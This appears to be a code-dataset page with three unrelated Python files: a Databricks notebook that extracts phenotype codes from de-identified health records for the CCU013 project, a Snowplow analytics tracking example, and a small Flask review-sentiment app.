# MAGIC **NB this will return all codes up to the last ProductionDate**
# MAGIC Subsetting, e.g. to pre-COVID date, or prior to `01/01/2020` will be done in subsequent notebooks
# MAGIC
# MAGIC **Project(s)** CCU013
# MAGIC
# MAGIC **Author(s)** <NAME>
# MAGIC
# MAGIC **Reviewer(s)**
# MAGIC
# MAGIC **Date last updated** 2022-01-22
# MAGIC
# MAGIC **Date last reviewed** *NA*
# MAGIC
# MAGIC **Date last run** 2022-01-22
# MAGIC
# MAGIC **Changelog**
# MAGIC * `21-05-19 ` V1 initial eversion - single first date of code per patient
# MAGIC * `21-07-14` V2 each instance/date of code per patient
# MAGIC * `21-09-08` V3 added parameters for table names + ProductionId
# MAGIC * `21-10-05` V4 added programatic extraction of latest `ProductionDate` + basic tests for QC
# MAGIC
# MAGIC **Data input**
# MAGIC * Codelist:
# MAGIC * `ccu013_caliber_codelist_master`
# MAGIC * Datasets: (NB working off the raw datasets, not freezes, using ProductionDate)
# MAGIC * GDPPR: `dars_nic_391419_j3w9t.gdppr_dars_nic_391419_j3w9t`
# MAGIC * HES APC: `dars_nic_391419_j3w9t_collab.hes_apc_all_years`
# MAGIC
# MAGIC
# MAGIC **Data output**
# MAGIC * `ccu013_caliber_skinny` = 'skinny' table of each mention of phenotype per pt
# MAGIC * Intermediate outputs:
# MAGIC * `ccu013_caliber_tmp_pts_gdppr`
# MAGIC * `ccu013_caliber_tmp_data_apc_icd`
# MAGIC * `ccu013_caliber_tmp_data_apc_opcs`
# MAGIC
# MAGIC
# MAGIC **Software and versions** `python`
# MAGIC
# MAGIC **Packages and versions** `pyspark`
# COMMAND ----------
# MAGIC %run /Workspaces/dars_nic_391419_j3w9t_collab/CCU013/COVID-19-SEVERITY-PHENOTYPING/CCU013_00_helper_functions
# COMMAND ----------
# Params
# Use the latest ProductionDate
production_date = spark.sql("SELECT MAX(ProductionDate) FROM dars_nic_391419_j3w9t_collab.wrang002b_data_version_batchids").first()[0]
print("ProductionDate:", production_date)
# Table names
gdppr_table = "dars_nic_391419_j3w9t_collab.gdppr_dars_nic_391419_j3w9t_archive" # No non-archive equivalent
hes_apc_table = "dars_nic_391419_j3w9t_collab.hes_apc_all_years_archive"
# without dars_nic_391419_j3w9t_collab. prefix
output_table = "ccu013_caliber_skinny"
# COMMAND ----------
from pyspark.sql.functions import array, col, explode, lit, struct
from pyspark.sql import DataFrame
from typing import Iterable
def melt(df: DataFrame,
id_vars: Iterable[str], value_vars: Iterable[str],
var_name: str="variable", value_name: str="value") -> DataFrame:
"""Convert :class:`DataFrame` from wide to long format."""
# Create array<struct<variable: str, value: ...>>
_vars_and_vals = array(*(
struct(lit(c).alias(var_name), col(c).alias(value_name))
for c in value_vars))
# Add to the DataFrame and explode
_tmp = df.withColumn("_vars_and_vals", explode(_vars_and_vals))
cols = id_vars + [
col("_vars_and_vals")[x].alias(x) for x in [var_name, value_name]]
return _tmp.select(*cols)
# COMMAND ----------
# MAGIC %md
# MAGIC # 1. GDPPR
# MAGIC
# MAGIC Changelog:
# MAGIC * `21/7/14`:
# MAGIC * Updated to return every instance of a code per individual, not just the first.
# MAGIC * Achieved by commenting out code below (`MIN(a.DATE) as date` and `GROUP BY a.NHS_NUMBER_DEID, b.phenotype, a.code`)
# COMMAND ----------
pts_gdppr = spark.sql(f"""
SELECT
a.NHS_NUMBER_DEID as person_id_deid,
b.phenotype,
a.DATE as date,
a.CODE as code,
'SNOMEDCT' as terminology
FROM
{gdppr_table} as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'SNOMEDCT'
AND
a.ProductionDate == "{production_date}"
""")
assert pts_gdppr.count() !=0, "Table is empty"
print("Tests passed")
pts_gdppr.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_gdppr')
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT COUNT(*), COUNT(DISTINCT person_id_deid), COUNT(DISTINCT phenotype)
# MAGIC FROM global_temp.ccu013_caliber_tmp_pts_gdppr
# MAGIC -- 21/05/19: 139898128 30821083 166
# MAGIC -- 21/07/14: 469772311 31131194 166
# MAGIC -- 21/09/08: 477248914 31348834 166
# MAGIC -- 21/10/05: 477248914 31348834 166
# COMMAND ----------
# MAGIC %md
# MAGIC # 2. HES APC Diagnoses
# COMMAND ----------
data_apc_icd = spark.sql(f"""
SELECT
PERSON_ID_DEID as person_id_deid,
ADMIDATE as date,
DIAG_4_01, DIAG_4_02, DIAG_4_03, DIAG_4_04, DIAG_4_05,
DIAG_4_06, DIAG_4_07, DIAG_4_08, DIAG_4_09, DIAG_4_10,
DIAG_4_11, DIAG_4_12, DIAG_4_13, DIAG_4_14, DIAG_4_15,
DIAG_4_16, DIAG_4_17, DIAG_4_18, DIAG_4_19, DIAG_4_20
FROM
{hes_apc_table}
WHERE
ProductionDate == "{production_date}"
""")
assert data_apc_icd.count() !=0, "Table is empty - may indicate issue with production_date"
data_apc_icd = melt(data_apc_icd,
id_vars=['person_id_deid', 'date'],
value_vars=['DIAG_4_01', 'DIAG_4_02', 'DIAG_4_03', 'DIAG_4_04', 'DIAG_4_05',
'DIAG_4_06', 'DIAG_4_07', 'DIAG_4_08', 'DIAG_4_09', 'DIAG_4_10',
'DIAG_4_11', 'DIAG_4_12', 'DIAG_4_13', 'DIAG_4_14', 'DIAG_4_15',
'DIAG_4_16', 'DIAG_4_17', 'DIAG_4_18', 'DIAG_4_19', 'DIAG_4_20']
) \
.drop('variable') \
.withColumnRenamed("value","code") \
.na.drop() # drop all NAs
assert data_apc_icd.count() != 0, "Table is empty"
assert data_apc_icd.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert data_apc_icd.where(col("date").isNull()).count() == 0, "date has nulls"
assert data_apc_icd.where(col("code").isNull()).count() == 0, "code has nulls"
print("Passed tests")
data_apc_icd.createOrReplaceGlobalTempView('ccu013_caliber_tmp_data_apc_icd')
# COMMAND ----------
pts_apc_icd = spark.sql("""
SELECT
a.person_id_deid,
b.phenotype,
a.date as date,
a.CODE as code,
'ICD' as terminology
FROM
global_temp.ccu013_caliber_tmp_data_apc_icd as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'ICD'
""")
assert pts_apc_icd.count() != 0, "Table is empty"
assert pts_apc_icd.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert pts_apc_icd.where(col("phenotype").isNull()).count() == 0, "phenotype has nulls"
assert pts_apc_icd.where(col("date").isNull()).count() == 0, "date has nulls"
assert pts_apc_icd.where(col("code").isNull()).count() == 0, "code has nulls"
assert pts_apc_icd.where(col("terminology").isNull()).count() == 0, "terminology has nulls"
print("Passed tests")
pts_apc_icd.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_apc_icd')
# COMMAND ----------
# MAGIC %md
# MAGIC # 3. HES APC with OPCS4 codes
# COMMAND ----------
data_apc_opcs = spark.sql(f"""
SELECT
PERSON_ID_DEID as person_id_deid,
ADMIDATE as date,
OPERTN_4_01, OPERTN_4_02, OPERTN_4_03, OPERTN_4_04, OPERTN_4_05,
OPERTN_4_06, OPERTN_4_07, OPERTN_4_08, OPERTN_4_09, OPERTN_4_10,
OPERTN_4_11, OPERTN_4_12, OPERTN_4_13, OPERTN_4_14, OPERTN_4_15,
OPERTN_4_16, OPERTN_4_17, OPERTN_4_18, OPERTN_4_19, OPERTN_4_20,
OPERTN_4_21, OPERTN_4_22, OPERTN_4_23, OPERTN_4_24
FROM
{hes_apc_table}
WHERE
ProductionDate == "{production_date}"
""")
assert data_apc_opcs.count() !=0, "Table is empty - may indicate issue with production_date"
data_apc_opcs = melt(data_apc_opcs,
id_vars=['person_id_deid', 'date'],
value_vars=[
'OPERTN_4_01', 'OPERTN_4_02', 'OPERTN_4_03', 'OPERTN_4_04', 'OPERTN_4_05',
'OPERTN_4_06', 'OPERTN_4_07', 'OPERTN_4_08', 'OPERTN_4_09', 'OPERTN_4_10',
'OPERTN_4_11', 'OPERTN_4_12', 'OPERTN_4_13', 'OPERTN_4_14', 'OPERTN_4_15',
'OPERTN_4_16', 'OPERTN_4_17', 'OPERTN_4_18', 'OPERTN_4_19', 'OPERTN_4_20',
'OPERTN_4_21', 'OPERTN_4_22', 'OPERTN_4_23', 'OPERTN_4_24'
]) \
.drop('variable') \
.withColumnRenamed("value","code") \
.na.drop()
assert data_apc_opcs.count() != 0, "Table is empty"
assert data_apc_opcs.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert data_apc_opcs.where(col("date").isNull()).count() == 0, "date has nulls"
assert data_apc_opcs.where(col("code").isNull()).count() == 0, "code has nulls"
print("Passed tests")
data_apc_opcs.createOrReplaceGlobalTempView('ccu013_caliber_tmp_data_apc_opcs')
# COMMAND ----------
pts_apc_opcs = spark.sql("""
SELECT
a.person_id_deid,
b.phenotype,
a.date as date,
a.CODE as code,
'OPCS' as terminology
FROM
global_temp.ccu013_caliber_tmp_data_apc_opcs as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'OPCS'
""")
assert pts_apc_opcs.count() != 0, "Table is empty"
assert pts_apc_opcs.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert pts_apc_opcs.where(col("phenotype").isNull()).count() == 0, "phenotype has nulls"
assert pts_apc_opcs.where(col("date").isNull()).count() == 0, "date has nulls"
assert pts_apc_opcs.where(col("code").isNull()).count() == 0, "code has nulls"
assert pts_apc_opcs.where(col("terminology").isNull()).count() == 0, "terminology has nulls"
print("Passed tests")
pts_apc_opcs.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_apc_opcs')
# COMMAND ----------
# MAGIC %md
# MAGIC # 4. Unite & aggregate each dataset's phenotypes
# MAGIC
# MAGIC Plan:
# MAGIC * Union all each source
# MAGIC * Group by ID, select MIN date
# MAGIC * Narrow -> wide
# MAGIC * Sum duplicate entires - i.e. replace >1 with 1
# MAGIC * These arise where the same diagnosis code is used multiple times on a given day for a given patient
# MAGIC * This does NOT represent a burden of illness but coding/administrative details
# MAGIC * Therefore if we are to use `n_occurences`/prevalence as a feature (instead of just binary) we need to remove these
# COMMAND ----------
patients = spark.sql("""
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_gdppr
UNION ALL
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_apc_icd
UNION ALL
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_apc_opcs
""") \
.dropDuplicates()
assert patients.count() != 0, "Table is empty"
assert patients.select('terminology').distinct().count() == 3, "Doesn't contain 3 distinct terminologies, should be just SNOMEDCT, ICD, OPCS"
assert patients.select('phenotype').distinct().count() >= 270, "Data contains less than 270 distinct phenotypes"
print("Passed checks")
patients.createOrReplaceGlobalTempView(output_table)
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT
# MAGIC COUNT(*) as mentions,
# MAGIC COUNT(DISTINCT person_id_deid) as unique_pts,
# MAGIC COUNT(DISTINCT phenotype) as phenotypes,
# MAGIC COUNT(DISTINCT terminology) as terminologies
# MAGIC FROM
# MAGIC global_temp.ccu013_caliber_skinny
# COMMAND ----------
# MAGIC %md
# MAGIC # 5. Write table
# COMMAND ----------
drop_table(output_table)
create_table(output_table)
# COMMAND ----------
# MAGIC %md
# MAGIC # 6. Optimise `delta table`
# MAGIC Consider ordering by person_id_deid, code or phenotype to improve subsequent joins
# COMMAND ----------
spark.sql(f"OPTIMIZE dars_nic_391419_j3w9t_collab.{output_table} ZORDER BY person_id_deid")
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_caliber_skinny LIMIT 10
| StarcoderdataPython |
3267127 | <reponame>lclarko/GDX-Analytics
# See https://github.com/snowplow/snowplow/wiki/Python-Tracker
# and https://github.com/snowplow-proservices/ca.bc.gov-schema-registry
import time
import random
from snowplow_tracker import Subject, Tracker, AsyncEmitter
from snowplow_tracker import SelfDescribingJson
# Set up core Snowplow environment
s = Subject()
e = AsyncEmitter("spm.apps.gov.bc.ca", protocol="https")
t = Tracker(e, encode_base64=False, app_id='orgbook_api')
# Example Snowplow for an external API V3 call to "/search/topic?name=BC0772006"
search_json = SelfDescribingJson( 'iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
'internal_call': False,
'api_version': 'v3',
'endpoint': 'search/topic',
'total': 1,
'response_time': 67,
'parameters': ['name']
})
# Example Snowplow for an external API V3 call to "/credentialtype"
credentialtype_json = SelfDescribingJson( 'iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
'internal_call': False,
'api_version': 'v3',
'endpoint': 'credentialtype',
'response_time': 102,
'total': 6
})
# Example Snowplow for an external API V3 call to "/credentialtype/1/language"
credentialtype_language_json = SelfDescribingJson( 'iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
'internal_call': False,
'api_version': 'v3',
'endpoint': 'credentialtype/{id}/language',
'response_time': 302,
'total': 1,
'parameters': ['id']
})
t.track_self_describing_event(search_json)
time.sleep(5)
t.track_self_describing_event(credentialtype_json)
time.sleep(5)
t.track_self_describing_event(credentialtype_language_json)
time.sleep(5)
| StarcoderdataPython |
3232679 | from flask import Flask, redirect, url_for, request ,render_template
from reviewanalysis import *
from datafeed import *
app = Flask(__name__)
@app.route('/')
def index():
return render_template("index.html")
@app.route('/login')
def login():
return render_template("login.html")
@app.route('/thanks')
def thanks():
return render_template('ThankYou.html')
@app.route('/sucess/<name>/<rating>/<review>')
def success(name,rating,review):
reviewrate=output_scenti(review)
appendexcel(name,rating,review,reviewrate)
return redirect(url_for('thanks'))
@app.route('/feedbackform', methods=['POST'])
def feedbackform():
if request.method == 'POST':
cname = request.form.get("cuname",None)
ctext = request.form.get("cure",None)
crating = request.form.get("rate",None)
return redirect(url_for('success', name=cname,rating=crating,review=ctext))
if __name__ == '__main__':
app.run(debug=True) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.